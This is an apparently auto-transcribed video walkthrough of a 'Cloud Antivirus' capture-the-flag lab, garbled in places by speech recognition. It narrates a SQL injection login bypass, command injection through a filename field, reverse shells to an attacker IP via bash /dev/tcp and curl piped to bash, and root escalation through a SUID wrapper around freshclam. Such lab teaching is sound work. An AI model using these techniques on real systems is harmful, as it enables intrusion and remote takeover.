Hey, what's up everybody? Here's Matic again. Today we're going to be playing Board Hacker Block Cloud Antivirus. I think it's the name, the whole name. And here's the Nmap scan. As always, tag pn to tell Nmap the host is already up and running. This will avoid making any ping to like, well, this is the opposite of the tag is sent, just to avoid making pings, ping scans and seeing if the host is up. We're basically telling the host is already up, right? And tag is v to perform a service version detection scan plus a c appended to it to run default scripts like these ones to each discovered service. Tag in to avoid DNS resolution, just to speed it up, and T5, which is the faster way of doing it without using min rate, for example. And that's all, right? So we found a port 22 for SSH 7.6 P1 and a 8080 running a Python web server over worksuck HTTPD 0.14.1, right? So when we come up here, we'll see this, right? Cloud antivirus scanner. This is a beta cloud antivirus scanner service. Please enter your invite code to start testing, right? And what I like to do now is run a, right, well, we can use this taxi to use caller.pod, U for URL. In this case is 8080 for port. The directory from seclist, directory list, lowercase. Well, actually, let me use the regular one. Medium, I think it was. No, 2.3 medium. That's it. 200 threads. And ignore comments. This has no comments. I modified it a bit. Let's see if we find something. We have a console. Probably it will have like, well, it will ask us for a pin, which we don't have. There's a way to find the pin, but in Hatrix you can find that. But we actually need some other kind of information. So yeah, and we have, okay, we have some login, output, scan. And at this point, we can start trying like escape, basic scan, basic escape characters, just to test if we do have some SQL injection or whatever error it might come up, right? So let me try with this one, and let me just tap this one to speed it up over here, and look at that. Okay, so we have well, since the console is up, it looks like there's a debugger method, or yeah, like a debugger up and running. Traceback interpreter, as you can see here, right, and in the left down corner. And well, we see a lot of information. I can see this super interesting here. So we have the whole function for logging in, and I can see that the password is being like concatenated and not parameterized, right? So in terminal, I mean in the technically we can definitely bypass this, right? So let me just open up a notepad and look at this. So so it is doing this, right? Like select everything from code where password is equal to, and actually this one, because the single apostrophe closes the execute thing one, and then reopens it here to inject, well, to append text, which is quotation marks, right? So yeah, whatever my password is, and this one, right? This is basically. So I have a question though. what about if we try some from code? Let me zoom this up, where password is equal to, this opens. Now this will be my payload. Okay, whatever, close it, or 1 equals 1. That way this apostrophe or this quotation mark will be closing it up here. I mean, technically this should work, right? So let me copy that and let's go back here. Let me try that. Right? Let's see if we had luck. And we do. Look at that. We're being redirected. So that worked. That's cool. That was a little bit of code analysis. Super easy. Super basic as well. And look at that. So I can apparently, let me open up my spec terminal in my network tab just to see the requests going on. And I don't know. I mean, it says some of these files with our scanner. So I don't know. Let me scan eCar. So let me scan that. It's sending a post request to output, and it's sending. Well, it hasn't sent anything yet. Well, let us wait a little bit. I mean, this is expected, right? Like, I don't know if it's taken too much. There you go. Okay, so there's a post 200 status code. This was the request. File name equals eCar, right? And that's cool. So let me check if I can handle this over curl. And curl s http 8080 output, and as data we're gonna say that's, sorry, so file name, just to test again, eCar, right? Oh, let me use cookie if we do have one. Session, we do have jot cookie, right? So cookie session like this. Cool. Oh, okay. Single quote. So let us wait a little bit. According to this, it took 27 seconds. That's a lot. But it's weird because at the same time it says scan files 0, right? Like, why did you take so long if you didn't scan anything, right? And look at that, we have the same thing. This time it took 19 seconds. That's cool. So I like to try. Let me just move it up here and delete it from here for ease of use only. Nope. And let me try if I can, for example, escape out of this and execute some kind of command like ID. This is just testing. I think this was my very first guess when I did the machine at first, right? So let us wait. I don't honestly remember if this was the way. If not, we will try some other tricks. That should do it, you know? It's taking a lot, actually. Wow, it's taking a lot. Look at that. That's wonderful. So we have RC. I mean, by appending a semicolon, we were able to escape out of the function that we're that was handling like the scan thing, and we did it. Look at that, it took like 69 seconds. That's weird. Weird as hell. I mean, it's like it doesn't have any sense, but okay. So at this point, what I will do is I'm gonna grab my reverse shell like with this. Let me go with let me go to exploits. Now index.html. Let's treat this file as if it was a bash script file. So bin bash c bash.i redirections def tcp 192.168.56.101. There you go. It's cool. Now let me host it on an HTTP server. Whatever port is fine. Let me go ahead, and I think curl is installed. I won't be like using which curl because it's taking a lot just to run one command, so that's why I wanted to grab my reverse shell fast. But yeah, I'm gonna be MD668 56.101 over port 8000, and let's pipe that to bash, right? Let's see if we got it. And we'll see. It might take a minute or so. Maybe the longer the command is, the longer it takes. I don't know. Yeah. So we have the get, and it didn't interpret it. Okay. What can we do here? Okay, let me try. Okay, index.html file. Was it cool? Yeah. Okay, so it didn't work. So let me try just a regular reversal right here. acar bin bash taxi dash i the TCP 192.168.56.101 4444, and yeah, let's go with that. Whoa, what happened there? Yeah, I don't know what's going on. Why don't we go to burpsuit real quick? I think that will be easier. Maybe you sometimes just need to try several tools. There has been times where curl doesn't work for me to get a job done, while burpsuit does, right? Or people use, for example, fuzzers like Buster doesn't work in some moments, then FFUF works, or WFUSZZ doesn't work, all this stuff. We'll see what's up. Doesn't matter. Go scan. Let me go to burp suite. Do we? Yeah. Cool. Remote. Drop it. Let me try this again. Just to see how much it takes. Okay, cool. So once again, let me just curl 192.168 56.101 8000 and pipe this to bash, because it's weird. I can swear I triggered my reversal with this, but we'll see. We'll see if we get the request. get, and we're not. Okay. So let me again bin bash p bash I def TCP 192.168.56.101 over 4444 4444, and let me encode all that from here, but not this one. I will see. There you go. So it worked. As I told you, it didn't work in curl, maybe because it wasn't URL encoded. Yeah, it's fine. I mean, obviously there's the tag G and data URL encode, but you wanted to show like this thought, right? Sometimes a tool works, sometimes it doesn't. So you want in your pen test engagements or your exam, I mean, yeah, certification exams, you want to be super handy with your tools, right? So let me just stabilize my shell. STTY raw minus echo and for ground, and reset the X term, and then export term and X term, right? Now here we have a database SQL. If we do a file database, we'll see SQLite 3, right? Now if we do SQLite 3, SQLite, or which MySQL, we don't have any of those. So you can like send it over to your own machine and inspect it with your SQLite 3 native tool or utility, and you will find some invitation codes that you may have used in this section. It asks them for, but yeah, as you can see, we just bypass them, right? So okay, let's continue. And look at that, that is interesting. So cat app pi, first stuff. So we have a route from output, and let me see what's going on here, because we definitely like well, where would be probably here. Okay, so process poppin clam scan, and look at this, it's concatenating a file name that is the file name we sent over post, right? So here's the basically in this spot, here is the semicolon and the commands we execute. So that composed the whole command, like this whole section, right? So that's the error there. They must implement some serious input validation right there. So I can see here that I'm on my home scanner. Let me see if there are other users. Cloud AV. Apparently nothing of interest at least. Remember, this is a trick just to refer to the very last argument you passed as a command, no matter how long it is. So cool. We're here, and we have a database SQL, all this stuff, and we have some. Well, when there's a binary with red, it typically means that it's a SUID, right? It has this sticky bit assigned, like this. So whoever's execute this, it doesn't matter if it's a scanner or Tawny or whatever it is, will be executing it with root permissions because it has this sticky bit. Now we have also the source code. So let's look at it. Okay, so I see it's defining a fresh clam variable as user bin fresh clam. I mean, it's using the absolute path, so there's no way to hijack this. And that's cool. If there are less arguments than 2, it will print out this tool lets you update antivirus rules. Remember we're playing with clam IV. Where is it? I mean, cloud IV. Well, let me just cut it out again. Whenever you see a fresh clam, this is like the utility that updates some antivirus rules and virus, malware, all this stuff databases, right? So yeah, so we're playing actually with clam IV. I don't know how the name is pronounced, but yeah. So charg in a command, it's allocating some memory in order to avoid buffer overflow exploitations, and it's saying, okay, the fresh clam, that is this one, the length of this, that is, I think 1, 2, 3, 4, 8, 9, 10, 13, 16, 17, 18. Or whatever. Characters plus the argument on the indexed 1, right? So if we input like update cloud AV, whatever, well, that whatever will be like 30 characters, I don't know, whatever, literally, and that plus 2. So there's an offset in order to avoid buffer overflows. So in Sprint is actually saving into command variable 2 things. First, a string named fresh clam, that is this one, right? And the argument 1, which is whatever argument we passed to the update cloud IV binary, which has an SUID, right? So if this one, that is command. Then it sets its group ID to 0, is its user ID to 0, and executes this command with the system. So what's the difference between doing this, right, and doing this? Asked. Apparently nothing, right? Like, why did you do this? Makes no sense at all. Well, when you I mean, he didn't want to set like the SUID to fresh clam itself, and the developer, instead of that, applied it to this binary. So you can start playing around, and you'll find out that this will actually receive command arguments, right? So what I've tried first, when I didn't know how to exploit this, was to try something like this. For example, since we were receiving an error, I try on error execute ID, but it didn't work anyway. I also tried, for example, using age and a semicolon and ID again, but it just executed the scanner. Why? Because when you execute this in this context, this is a command, and the syntax according to the code we just saw is alright with this completely different command. That's another instance, right? But what about if we do this, making some commands like just one? I mean, this is just one parameter being passed to this, not 1, 2, 3 commands. Now let's try that. Look at that. Now we are executing some commands in the context of the program as root, right? So what about if we try bash? Look at that, we're in a bash. So now we're bash, literally. So let's go to root, and there's no flag actually, I think. Yep, there's no flag. Sorry guys for that. But yes, that's all for all. That's all for today. Thank you very much for joining, and I hope you guys liked it. I think it's a pretty fun box. I mean, not so hard, but super fun for beginners to you know wrap your head around Linux and the command line interface and some commands, and grasping the way Linux interprets some commands when passing arguments to some binaries and all that stuff. And yes, Nothing else to say. Bye bye.